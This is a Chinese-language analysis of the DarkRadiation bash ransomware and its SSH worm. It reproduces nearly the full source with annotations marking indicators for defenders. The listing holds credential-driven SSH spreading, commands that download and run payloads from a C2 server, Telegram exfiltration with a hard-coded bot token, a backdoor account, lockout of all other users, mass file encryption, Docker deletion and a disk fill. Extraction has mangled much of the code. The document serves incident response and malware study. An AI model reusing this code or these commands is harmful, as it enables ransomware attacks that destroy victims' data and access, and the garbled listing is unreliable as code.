SSH 蠕虫
downloader.sh
$crypt_pass
蠕虫在运行时向 C&C 服务器(185.141.25.168)的 api.php 发起 API 调用获取加密口令,口令本身并不硬编码在脚本中,随后作为唯一的命令行参数传递给勒索软件。注意此处 apirequests 的值以“…AAbxF1s=”结尾,而下文 supermicro_cr 配置段中用于解密的请求以“…AAbxF2s=”结尾,两者是不同的请求。
# Fetch the AES passphrase from the C2 at run time; it is never stored in the
# script itself. The value is later passed to the ransomware as its single
# argument (see ssh_exec_command). Hard-coded C2 host and request token are
# usable as network IOCs.
crypt_pass=$(curl -s "http://185.141.25.168/api.php?apirequests=udbFVt_xv0tsAmLDpz5Z3Ct4-p0gedUPdQO-UWsfd6PHz9Ky-wM3mIC9El4kwl_SlX3lpraVaCLnp-K0WsgKmpYTV9XpYncHzbtvn591qfaAwpGyOvsS4v1Yj7OvpRw_iU4554RuSsvHpI9jaj4XUgTK5yzbWKEddANjAAbxF1s=") # AES PASS
start_thread
start_thread 遍历 allThreads 数组,其中每个元素是一条 base64 编码的凭据记录(格式为 用户|IP|端口|true/false|密码,见 check_ssh_connect 的示例)。解码后先调用 check_ssh_connect 探测目标,连接成功则调用 ssh_exec_command 在目标上下载并执行勒索软件,并通过 Telegram 上报每个目标的处理结果。
# Worm driver.
# Iterates over every base64-encoded target record in the allThreads array,
# probes it with check_ssh_connect and, on success, deploys the payload with
# ssh_exec_command. Every outcome is reported to the operator over Telegram
# through send_message.
# Decoded record format: "user|ip|port|true/false|password" (see the example
# comment in check_ssh_connect).
# NOTE: this listing is extraction-mangled ("$" is missing before variable
# references, e.g. "case? in"); it is reproduced as found, not as runnable code.
start_thread()
{
for encode_ssh_credential in {allThreads[@]}; do
#decode_ssh_credential=(openssl enc -base64 -d <<< encode_ssh_credential)
# base64-decode one target record
decode_ssh_credential=(openssl enc -base64 -d <<< encode_ssh_credential)
echo "Rundecode_ssh_credential"
check_ssh_connect decode_ssh_credential
# dispatch on check_ssh_connect's return code (0 / 254 / 255)
case? in
# 0: credentials worked -> push and launch the ransomware
'0') ssh_exec_command decode_ssh_credential
send_message "Run upload script (decode_ssh_credential)";;
# 254: ICMP ping failed
'254') echo "Ping error"
send_message "Host unavailable (decode_ssh_credential)";;
# 255: SSH connection / authentication failed
'255') echo "SSH connection bad"
send_message "Bad credential (decode_ssh_credential)";;
*) echo "Unknown error"
esac
done
}
# Kick off the spreading loop. Only the first element ($allThreads) is passed
# positionally; start_thread ignores its argument and walks the whole array.
start_thread $allThreads
install_tools
在受感染系统上通过 yum 安装蠕虫所需的工具:wget、curl、sshpass(非交互式 SSH 密码认证)、pssh 和 openssl,安装输出被重定向丢弃。注意此处只调用 yum,而远程执行的命令同时尝试 apt 和 yum。
# Install the worm's tooling on the local (already infected) host via yum.
# sshpass provides non-interactive password auth for check_ssh_connect and
# ssh_exec_command; all output is discarded. yum-only here, whereas the remote
# command in ssh_exec_command tries both apt and yum.
install_tools ()
{
yum install wget curl sshpass pssh openssl -y &>/dev/null
}
check_ssh_connect —— 蠕虫的侦察
使用 sshpass 实现非交互式的 SSH 密码认证。在密码分支中通过 ssh 的 -o 选项设置“passwordauthentication=yes”(这是 ssh 的选项,而非 sshpass 的参数),并以“stricthostkeychecking=no”和“userknownhostsfile=/dev/null”关闭主机密钥校验以避免任何交互提示。远程执行的命令只是“:”(空命令),仅用于验证凭据是否可用。
# Reconnaissance step: test whether a target record yields a working SSH login.
# Argument ($1): "user|ip|port|true/false|password" split on "|" with awk.
#   field 4 "true"  -> password auth via sshpass
#   field 4 "false" -> key auth via "ssh -i rsa_key"
# Returns 0 on a successful login, 254 if ping fails, 255 if SSH fails.
# Host-key checking is disabled (stricthostkeychecking=no, known_hosts sent to
# /dev/null) so no prompt can stall the worm; the remote command is ":" (a
# no-op), so a successful run proves only that the credentials are accepted.
# The attempts should appear in the target's sshd authentication logs like any
# other password/publickey attempt from the infected source host.
check_ssh_connect()
#example (check_ssh_connect root|127.0.0.1|22|true/false|password/null);
#true=check with passw;
#false=check with key;
#return code:0-good connect 254-ping error 255-ssh connect error
{
parse_arg=1
user_host=(echo "{parse_arg}" | awk -F "|" '{print1}')
ip_host=(echo "{parse_arg}" | awk -F "|" '{print 2}')
port_host=(echo "{parse_arg}" | awk -F "|" '{print3}')
passwd_state=(echo "{parse_arg}" | awk -F "|" '{print 4}')
password=(echo "{parse_arg}" | awk -F "|" '{print5}')
# one ICMP echo with a 3 s deadline decides reachability
if (ping ip_host -c 1 -w 3 >/dev/null); then
echo -e "[+] Ping \033[32m{ip_host}\033[0m good"
# field 4 is the literal word "true" or "false", executed as a command in a
# subshell so the if-branch follows its exit status
if (passwd_state); then
echo -e "SSH Connection with Password:password to \033[33muser_host@ip_host:port_host\033[0m"
# password goes on the sshpass command line (visible in the local process list)
if (sshpass -ppassword ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=yes "{user_host}"@"{ip_host}" -p "{port_host}" : 2>/dev/null); then
return 0 else
return 255
fi
else
# key branch: rsa_key is a key file (path/variable lost in extraction; TODO confirm)
echo -e "Check SSH Connection with Key: rsa_key \033[33muser_host@ip_host:port_host\033[0m"
if (ssh -i rsa_key -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=no "{user_host}"@"{ip_host}" -p "{port_host}" : 2>/dev/null);then
return 0
else
return 255
fi
fi
else
echo -e "[-] Ping \033[31m{ip_host}\033[0m bad"
return 254
fi
}
ssh_exec_command —— 蠕虫的传播
通过 SSH 在目标上执行一串命令:先尝试用 apt 和 yum 安装 wget、curl(密钥分支还安装 screen),进入“/usr/share/man/man8/”目录(借用 man 手册目录藏匿载荷),用 wget 下载勒索软件 supermicro_cr.gz;随后直接 chmod +x 并执行——尽管文件使用 .gz 后缀,脚本并未解压它。该目录与文件名可作为主机侧检测特征。
screen -dmS FUCK:以分离(detached)模式启动一个名为“FUCK”的 screen 会话来运行勒索软件,使其在 SSH 连接断开后继续运行;这个固定的会话名同样可作为检测特征。
nohup:后台启动
# Propagation step: log in to a target (same record format as check_ssh_connect)
# and run a one-liner that installs wget/curl (apt and yum are both tried so the
# command works on Debian- and Red Hat-based hosts), cd's into
# /usr/share/man/man8/, downloads supermicro_cr.gz from the C2, chmod +x's it
# and launches it inside a detached screen session named "FUCK" under nohup.
# Despite the .gz suffix the file is executed directly, never decompressed.
# Host IOCs: /usr/share/man/man8/supermicro_cr.gz, screen session "FUCK".
# Quoting note: the ticks around crypt_pass close and reopen the outer
# single-quoted remote command, so the worm substitutes the passphrase locally
# before the command is sent; the ransomware therefore receives it as argv[1].
ssh_exec_command()
{
parse_arg=1
user_host=(echo "{parse_arg}" | awk -F "|" '{print1}')
ip_host=(echo "{parse_arg}" | awk -F "|" '{print 2}')
port_host=(echo "{parse_arg}" | awk -F "|" '{print3}')
passwd_state=(echo "{parse_arg}" | awk -F "|" '{print 4}')
password=(echo "{parse_arg}" | awk -F "|" '{print5}')
if (passwd_state); then
# password branch: wraps the payload in "su root -c" and feeds su a fixed
# root password ("HITMANcodename47") through a here-string
sshpass -ppassword ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=yes "{user_host}"@"{ip_host}" -p "{port_host}" 'su root -c "apt install wget curl -y;yum install wget curl -y;cd /usr/share/man/man8/;wget http://185.141.25.168/api/supermicro_cr.gz;chmod +x supermicro_cr.gz;screen -dmS FUCK nohup ./supermicro_cr.gz 'crypt_pass' &" <<< HITMANcodename47'
else
# key branch: assumes the key already grants the needed privileges; no su
ssh -i rsa_key -o stricthostkeychecking=no -o userknownhostsfile=/dev/null -o passwordauthentication=no "{user_host}"@"{ip_host}" -p "{port_host}" 'apt install wget screen curl -y;yum install screen wget curl -y;cd /usr/share/man/man8/;wget http://185.141.25.168/api/supermicro_cr.gz;chmod +x supermicro_cr.gz;screen -dmS FUCK nohup ./supermicro_cr.gz 'crypt_pass' &'
fi
}
send_message
通过 Telegram Bot API 向攻击者发送感染确认信息。Bot token 与 chat_id 硬编码在脚本中,请求以 curl --insecure 发出(跳过 TLS 证书校验)并在后台执行、丢弃输出;对 api.telegram.org 的出站请求是可用的网络检测点。
# Operator notification over the Telegram Bot API.
# Argument ($1): message text, URL-encoded by curl.
# The bot token and chat id are hard-coded; each request is fired in the
# background with output discarded, and --insecure disables TLS certificate
# verification. The loop over ID_MSG allows several chat ids separated by
# whitespace, though only one is configured here.
send_message ()
{
TOKEN='1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
MSG_URL='https://api.telegram.org/bot'TOKEN'/sendMessage?chat_id='
MSG=1
ID_MSG='1297663267'
for id in ID_MSG
do
# fire-and-forget; failures are never observed
curl -s --insecure --data-urlencode "text=MSG" "MSG_URLid&" &>/dev/null &
done
}
DarkRadiation 勒索软件
supermicro_cr_third.SH
该脚本使用名为“node-bash-obfuscate”的开源工具进行混淆。解混淆方法:bash -x test.sh。注意:bash -x 会在打印跟踪信息的同时真正执行脚本,因此只能在隔离、断网的分析沙箱中进行,切勿在生产主机上运行。
main()
# Ransomware entry point. Order matters: privilege check, dependency install,
# start the login-watcher bot, fetch the per-file encryption helper, report
# "script installed" to the operator, then block in loop_wget_telegram until
# the C2 publishes the go-signal (0.txt).
main() {
check_root
check_curl
check_openssl
bot_who
get_script_crypt
tele_send_fase1
loop_wget_telegram
}
# Run the ransomware.
main
check_root
检测脚本是否以root权限运行,没有以root权限运行会自删退出
# Abort unless running as root (EUID 0); on failure delete the script
# itself from PATH_TEMP_FILE/NAME_SCRIPT_CRYPT and exit.
# Note: the visible configuration defines PATH_FILE, not PATH_TEMP_FILE,
# so the self-delete path may resolve to "/<NAME_SCRIPT_CRYPT>" — TODO confirm
# against the deobfuscated sample.
check_root() {
if ["EUID" - ne 0]
then echo "Please run as root"
rm - rfPATH_TEMP_FILE / $NAME_SCRIPT_CRYPT
exit
fi
}
check_openssl&&check_curl
安装 curl、wget 与 OpenSSL(同时尝试 apt-get 与 yum;apt 分支中的包名写成了“opennssl”,是样本自身的拼写错误),随后删除 /var/log/yum* 以清除安装痕迹,属于简单的反取证手段。
# Ensure openssl is present (needed to decrypt the passphrase and by
# crypt_file.sh). Both apt-get and yum are tried; the apt package name is
# misspelled ("opennssl") in the sample. Yum logs are then wiped — an
# anti-forensics step worth noting for incident response.
check_openssl() {
apt - get install opennssl--yes
yum install openssl - y
rm - rf / var / log / yum *
}
# Ensure curl and wget are present via apt-get or yum, then delete yum logs
# to hide the installation activity (same anti-forensics step as check_openssl).
check_curl() {
apt - get install curl--yes
apt - get install wget--yes
yum install curl - y
yum install wget - y
rm - rf / var / log / yum *
}
bot_who
下载运行supermicro_bt
# Download the login-watcher (supermicro_bt) from the C2 into
# /usr/share/man/man8/, make it executable and start it in the background.
# Host IOC: /usr/share/man/man8/supermicro_bt.
bot_who() {
curl - s http: //185.141.25.168/telegram_bot/supermicro_bt -o "/usr/share/man/man8/supermicro_bt";cd /usr/share/man/man8/; chmod +x supermicro_bt; ./supermicro_bt &
}
supermicro_bt
使用“who”命令获取当前登录到系统的用户快照,并将结果保存到隐藏文件“/tmp/.ccw”。之后每 5 秒再次执行“who”,并将其输出的行数与“.ccw”中保存的行数进行比较。若行数不同(登录会话数量发生变化),恶意软件即通过 Telegram API 向攻击者发送主机名、IP 地址和当前的 who 输出。注意比较的仅是行数而非内容,因此同一周期内一次登出加一次登录并不会触发通知。
#!/bin/bash
# supermicro_bt — login watcher. Telegram settings are hard-coded; ID_MSG here
# reads "12976632671121093080", which looks like two chat ids
# (1297663267 and 1121093080) whose separator was lost — TODO confirm.
TOKEN='1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
MSG_URL='https://api.telegram.org/bot'TOKEN'/sendMessage?chat_id='
ID_MSG='12976632671121093080'
# send_message <chat_id> <text>: one background curl with TLS verification
# disabled (--insecure); the result is never checked.
send_message ()
{
res=(curl -s --insecure --data-urlencode "text=2" "MSG_URL1&" &)
}
# Main loop: snapshot "who" to /tmp/.ccw, then every 5 s compare the current
# line count of "who" with the saved one and alert the operator on any change.
# Only the number of lines is compared, not their content.
who>/tmp/.ccw # save the initial session list to a hidden temp file
while true; do {
gg=(who) # current session list
master=(cat /tmp/.ccw | wc -l) # number of lines in the saved snapshot
slave=(echo "{gg}" | wc -l) # number of lines in the current list
if [[ "master" != "slave" ]] # a changed count means someone logged in/out -> notify
then
for id inID_MSG
do
# report hostname, all IPs and the full "who" output to each chat id
send_message id "(hostname) (hostname -I){gg}"
done
echo "${gg}" > /tmp/.ccw # persist the new snapshot for the next comparison
fi
sleep 5
}; done
get_script_crypt
下载 crypt_file.sh;对单个文件的实际加密由这个独立脚本完成(本文未展示其内容),后续各 encrypt_* 函数都通过 xargs 并发调用它。
# Fetch the per-file encryption helper crypt_file.sh from the C2 and mark it
# executable. wget saves into the current directory (presumably
# /usr/share/man/man8/ after bot_who's cd — TODO confirm), while the chmod uses
# the absolute path. crypt_file.sh itself is not shown in this write-up.
get_script_crypt() {
wget http: //185.141.25.168/api/crypt_file.sh; chmod +x /usr/share/man/man8/crypt_file.sh
}
tele_send_fase1
发送信息 告知主机脚本安装
# Phase-1 beacon: tell every configured chat id that the script is installed
# on this host (message includes the hostname).
tele_send_fase1() {
for id in ID_MSG
do
send_messageid "$(hostname): script installed."
done
}
loop_wget_telegram
检查 C&C 服务器上是否存在“0.txt”,它相当于攻击的“开火信号”。若不存在,恶意软件不执行加密流程,而是休眠 60 秒后重试。wget 以“--spider”选项调用,只探测 URL 是否存在而不下载内容:退出码 0 表示文件存在并触发完整的攻击链;退出码 4 为网络错误;其余情况同样继续等待。因此在断网或 C&C 不可达的环境中,该样本只会无限循环轮询。
# Wait for the operator's go-signal, then run the whole attack chain once.
# Every 60 s "wget --spider" probes http://185.141.25.168/check_attack/0.txt
# (no download, 5 s timeout). Exit 0 = file exists -> attack; exit 4 =
# network failure -> keep waiting; anything else -> keep waiting as well.
# Without C2 connectivity this loop never terminates.
loop_wget_telegram() {
while true
do
sleep 60
wget http: //185.141.25.168/check_attack/0.txt -P /tmp --spider --quiet --timeout=5
if [? = 0];
then
# attack sequence: lock out users, encrypt, destroy docker, leave note, fill disk
create_user
user_change
encrypt_ssh
encrypt_grep_files
encrypt_home
encrypt_root
encrypt_db
docker_stop_and_encrypt
create_message
del_zero
exit
elif[ ? = 4];
then
continue else
continue
fi
done
}
create_user
创建新的后门账户:用户名取自 LOGIN_NEWUSER(“ferrum”),密码取自 PASS_NEWUSER(“MegPw0rD3”),并加入 wheel 组(在 Red Hat 系发行版上通常即 sudo 权限组)。该账户名是有价值的主机侧检测特征。
# Create the attacker's backdoor account (LOGIN_NEWUSER = "ferrum",
# PASS_NEWUSER = "MegPw0rD3", see the configuration section) and add it to
# the wheel group. The password is set by piping it twice into passwd.
create_user() {
useradd LOGIN_NEWUSER
echo - e "PASS_NEWUSER\nPASS_NEWUSER\n" | passwdLOGIN_NEWUSER
usermod - aG wheel $LOGIN_NEWUSER
}
user_change
读取“/etc/shadow”获取受感染系统上的全部账户列表。它用“megapassword”覆盖除“ferrum”之外所有用户的密码,并将这些用户从 wheel 组中移除(gpasswd -d 用户 wheel 与 deluser 用户 wheel 均为“从组中移除”,并非删除账户)。随后执行“usermod --shell /bin/nologin”禁止这些用户登录 shell,最后通过比较 who 输出中的终端,用 pkill -9 -t 强制终止除攻击者自身之外的所有登录会话。
# Lock every legitimate user out while keeping the backdoor account.
# 1. Every account in /etc/shadow except "ferrum" gets the password
#    "megapassword".
# 2. The same accounts are removed from the wheel group (gpasswd -d and
#    "deluser USER wheel" both remove group membership; no account is deleted).
# 3. Their login shell is set to /bin/nologin.
# 4. Every terminal session other than the attacker's own (from "who am i")
#    is killed with SIGKILL via pkill -t.
# 'grep -F "" /etc/shadow' simply prints all lines of the file.
user_change() {
a = (grep - F "" / etc / shadow | grep - v "ferrum" | cut - d: -f1)
for n in a
do
echo - e "megapassword\nmegapassword\n" | passwdn
done
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE gpasswd - d FILE wheel
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE deluser FILE wheel
grep - F "" / etc / shadow | cut - d: -f1 | grep - v "ferrum" | xargs - I FILE usermod--shell / bin / nologin FILE
# field 6 of "who" output is taken as the terminal identifier
me =(who am i | cut - d " " - f 6);
they = (who | cut - d " " - f6);
for n inthey;
do
if ["n" != "me"];
then pkill - 9 - t $n;
fi;
done
}
配置部分
勒索软件使用 OpenSSL 的 AES-256-CBC。加密口令由 worm 脚本作为命令行参数($1)传入,但该参数本身是加密并 base64 编码过的:脚本再次向 C&C 请求 PASS_DE 作为解密密钥,用“openssl enc -base64 -aes-256-cbc -d -pass pass:…”解出明文口令 PASS_DEC,并将其 echo 到标准输出。因此在 C&C 不可达的离线环境中无法还原出真实口令。
# Configuration section.
# PASS_DE  : key fetched from the C2 (request token ends in "...AAbxF2s=",
#            distinct from the worm's "...AAbxF1s=" request).
# PASS_ENC : the encrypted, base64-encoded passphrase handed over by the
#            worm as argv[1].
# PASS_DEC : plaintext passphrase = AES-256-CBC decryption of $1 with PASS_DE.
#            It is echoed to stdout and later passed to crypt_file.sh on the
#            command line, so it may survive in screen/nohup output or process
#            listings — a recovery lead for responders.
PASS_DE = (curl - s "http://185.141.25.168/api.php?apirequests=udbFVt_xv0tsAmLDpz5Z3Ct4-p0gedUPdQO-UWsfd6PHz9Ky-wM3mIC9El4kwl_SlX3lpraVaCLnp-K0WsgKmpYTV9XpYncHzbtvn591qfaAwpGyOvsS4v1Yj7OvpRw_iU4554RuSsvHpI9jaj4XUgTK5yzbWKEddANjAAbxF2s=")
PASS_ENC =1
PASS_DEC = (openssl enc - base64 - aes - 256 - cbc - d - pass pass:PASS_DE << < 1)
echoPASS_DEC
# Telegram reporting settings (same bot token as the worm)
TOKEN = '1322235264:AAE7QI-f1GtAF_huVz8E5IBdb5JbWIIiGKI'
URL = 'https://api.telegram.org/bot' TOKEN
MSG_URL =URL '/sendMessage?chat_id='
ID_MSG = '12976632671121093080'
NAME_SCRIPT_CRYPT = 'supermicro_cr'
# Backdoor account created by create_user: user "ferrum", password "MegPw0rD3"
LOGIN_NEWUSER = 'ferrum'
PASS_NEWUSER = 'MegPw0rD3'
PATH_FILE = "/usr/share/man/man8/"
encrypt_ssh
# Encrypt every authorized_keys file on the system.
# grep -r -l from "/" lists matching files; tr converts to NUL separation and
# xargs -P 10 runs crypt_file.sh on ten files in parallel, passing the plaintext
# passphrase PASS_DEC as an argument. Start/finish are reported over Telegram;
# the "Delete files." wording suggests crypt_file.sh removes the originals, but
# that script is not shown here.
encrypt_ssh() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt SSH KEYS files started."
done
grep - r '/' - e ""--include = \ authorized_keys - l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt SSH KEYS files Done. Delete files."
done
}
encrypt_grep_files
# Encrypt credential-bearing scripts/notes: every *.txt, *.sh and *.py file
# under "/" whose content matches "pass" (case-insensitive), ten in parallel
# via crypt_file.sh. The brace expansion "{txt,sh,py}" is split across lines
# in this listing by the extraction, not in the original.
encrypt_grep_files() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt PASS files started."
done
grep - r '/' - i - e "pass"--include = \ * .{
txt,sh,py
}
-l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt PASS files Done. Delete files."
done
}
encrypt_home
# Encrypt every file with an extension (pattern "*.*") under /home, ten in
# parallel via crypt_file.sh; progress is reported over Telegram.
encrypt_home() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt HOME files started."
done
grep - r '/home' - e ""--include = \ * . * -l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt HOME files Done. Delete files."
done
}
encrypt_root
# Same as encrypt_home but for /root: every "*.*" file, ten in parallel via
# crypt_file.sh, with Telegram progress messages.
encrypt_root() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt ROOT HOME files started."
done
grep - r '/root' - e ""--include = \ * . * -l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt ROOT HOME files Done. Delete files."
done
}
encrypt_db
# Encrypt database-related files system-wide: grep -r from "/" with a long
# --include brace list of database/backup extensions (both cases, some
# duplicated, some with stray spaces from extraction), then crypt_file.sh ten
# files at a time. Note "log" and "sql" are in the list, so plain log files
# and SQL dumps are hit too.
encrypt_db() {
for id in ID_MSG
do
send_messageid "(hostname): encrypt DATABASE files started."
done
grep - r '/' - e ""--include = \ * .{ bkp,BKP,dbf,DBF,log,4dd,accdb,accdc,accde,accdr,accdt,accft,adb,adb,ade,adf,adp,alf,ask,btr,cdb,cdb,ckp,cma,crypt12,crypt8,crypt9,dacpac,dad,dadiagrams,daschema,db,db,db - shm,db - wal,db,crypt12,db,crypt8,db3,dbc,dbf,dbs,dbt,dbv,dbx,dcb,dct,dcx,ddl,dlis,dp1,dqy,dsk,dsn,dtsx,dxl,eco,ecx,edb,edb,epim,exb,fcd,fdb,fdb,fic,fmp,fmp12,fmpsl,fol,fp3,fp4,fp5,fp7,fpt,frm,gdb,gdb,grdb,gwi,hdb,his,ib,idb,ihx,itdb,itw,jet,jtx,kdb,kexi,kexic,kexis,lgc,lwx,maf,maq,mar,marshal,mas,mav,mdb,mdf,mpd,mrg,mud,mwb,myd,ndf,nnt,nrmlib,ns2,ns3,ns4,nsf,nv,nv2,nwdb,nyf,odb,odb,oqy,ora,orx,owc,p96,p97,pan,pdb,pdb,pdm,pnz,qry,qvd,rbf,rctd,rod,rod,rodx,rpd,rsd,sas7bdat,sbf,scx,sdb,sdb,sdb,sdb,sdc,sdf,sis,spq,sql,sqlite,sqlite3,sqlitedb,te,teacher,temx,tmd,tps,trc,trc,trm,udb,udl,usr,v12,vis,vpd,vvv,wdb,wmdb,wrk,xdb,xld,xmlff,4DD,ABS,ACCDE,ACCFT,ADN,BTR,CMA,DACPAC,DB,DB2,DBS,DCB,DP1,DTSX,EDB,FIC,FOL,4DL,ABX,ACCDR,ADB,ADP,CAT,CPD,DAD,DB - SHM,DB3,DBT,DCT,DQY,DXL,EPIM,FLEXOLIBRARY,FP3,ABCDDB,ACCDB,ACCDT,ADE,ALF,CDB,CRYPT5,DADIAGRAMS,DB-WAL,DBC,DBV,DCX,DSK,ECO,FCD,FM5,FP4,ACCDC,ACCDW,ADF,ASK,CKP,DACONNECTIONS,DASCHEMA,DB.CRYPT8,DBF,DBX,DDL,DSN,ECX,FDB,FMP,FP5,FP7,GWI,IB,IHX,KDB,MAQ,MAV,MDF,MRG,NDF,NSF,ORA,P97,PNZ,ROD,SCX,SPQ,FPT,HDB,ICG,ITDB,LGC,MAR,MAW,MDN,MUD,NS2,NYF,ORX,PAN,QRY,RPD,SDB,SQL,HIS,ICR,ITW,LUT,MARSHAL,MDB,MDT,MWB,NS3,ODB,OWC,PDB,QVD,RSD,SDF,SQLITE,GDB,HJT,IDB,JTX,MAF,MAS,MDBHTML,MPD,MYD,NS4,OQY,P96,PDM,RBF,SBF,SIS,SQLITE3,SQLITEDB,TPS,UDL,WDB,XLD,TE,TRC,USR,WMDB,TEACHER,TRM,V12,WRK,TMD,UDB,VIS,XDB,rdb,RDB
}
-l | tr '\n' '\0' | xargs - P 10 - I FILE - 0 bash / usr / share / man / man8 / crypt_file.sh FILEPASS_DEC
for id in ID_MSG
do
send_messageid "$(hostname): encrypt DATABASE files Done. Delete files."
done
}
docker_stop_and_encrypt
停止系统上所有 docker 容器,停用并禁用 docker 服务,然后直接 rm -rf /var/lib/docker/ 删除全部镜像、容器和卷数据。尽管函数名带有 encrypt,这一步是纯粹的破坏而非加密,没有任何可解密的副本。
# Destroy the Docker installation: stop all containers, stop and disable the
# service, then delete /var/lib/docker/ (images, containers, volumes).
# Despite the name, nothing is encrypted here — the data is simply removed.
docker_stop_and_encrypt() {
docker stop $(docker ps - aq)
systemctl stop docker && systemctl disable docker
rm - rf / var / lib / docker /
}
create_message —— 勒索信
# Write the ransom note into /etc/motd so it is shown at every login.
# The heredoc body below is the note as captured in this write-up; the
# contact address is nationalsiense@protonmail.com.
create_message() {
cat > /etc/motd << EOF
"....."
Contact us on mail: nationalsiense @ protonmail.com
您已被黑客入侵!您的数据已被下载并加密。请联系Email:nationalsiense @ protonmail.com。如不联系邮件,将会被采取更严重的措施。
EOF
}
del_zero
/dev/zero 是一个无穷提供零字节的输入设备,常用于初始化文件或覆盖数据。del_zero 执行“dd if=/dev/zero of=/null”且未指定 count,因此会向根文件系统持续写零直到磁盘写满;随后的“rm -rf /nul”路径与“/null”不一致,写满磁盘的文件并不会被删除。其效果是覆盖磁盘空闲空间(妨碍恢复已删除的明文)并耗尽磁盘,加剧对受害主机的破坏。
# Fill the root filesystem with zeros: dd has no count, so it writes /null
# until the disk is full (overwriting free space, which hinders recovery of
# deleted plaintext). The follow-up rm targets "/nul", not "/null", so the
# filler file is left behind and the disk stays full.
del_zero() {
dd if = /dev/zero of = /null
rm -rf /nul
}
参考:
Bash 勒索软件 DarkRadiation 以基于 Red Hat 和 Debian 的 Linux 发行版为目标 |Trend Micro (英文)